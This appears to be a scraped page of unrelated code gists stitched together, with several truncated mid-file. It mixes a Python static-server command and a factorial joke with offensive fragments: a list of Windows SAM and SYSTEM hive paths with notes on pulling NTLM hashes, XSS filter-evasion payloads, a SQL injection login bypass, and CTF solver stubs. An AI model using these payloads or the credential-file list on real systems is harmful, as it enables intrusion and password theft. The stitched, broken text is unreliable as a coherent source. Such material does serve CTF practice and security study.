Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
#Newbie programmer | |
def factorial(x): | |
if x == 0: | |
return 1 | |
else: | |
return x * factorial(x - 1) | |
print factorial(6) | |
#First year programmer, studied Pascal |
import random | |
def get_map(num1,num2): | |
result = [] | |
idx = 0 | |
try: | |
for x in range(num1): | |
for y in range(num2): | |
result.insert(idx,(x,y)) |
%SYSTEMDRIVE%\boot.ini | |
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
%SYSTEMROOT%\repair\SAM | |
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
%SYSTEMROOT%\repair\system | |
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
%SYSTEMROOT%\repair\SAM | |
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
%WINDIR%\repair\sam | |
%WINDIR%\repair\system |
from __future__ import division | |
import hashlib | |
import requests | |
from datetime import datetime, timedelta | |
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}' | |
def totimestamp(dt, epoch=datetime(1970,1,1)): | |
td = dt - epoch | |
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6 |
# coding: utf-8 | |
""" | |
Unfortunately solved 20 minutes after the end of the CTF :( | |
""" | |
import re | |
import sys | |
import string | |
import requests |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
import requests | |
import re | |
#GLOBAL | |
base_url = "http://mezzanine.mysterious-hashes.net/" | |
format_flag = "flag{%s}" | |
#LEVEL 1 | |
payload = { | |
"user": "' OR 1=1#", | |
"pass": "' OR 1=1#" |
import requests | |
from bs4 import BeautifulSoup | |
url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/" | |
soup = BeautifulSoup(requests.get(url).text,"lxml") | |
headers = { | |
'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", | |
'content-type': "application/x-www-form-urlencoded", | |
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", |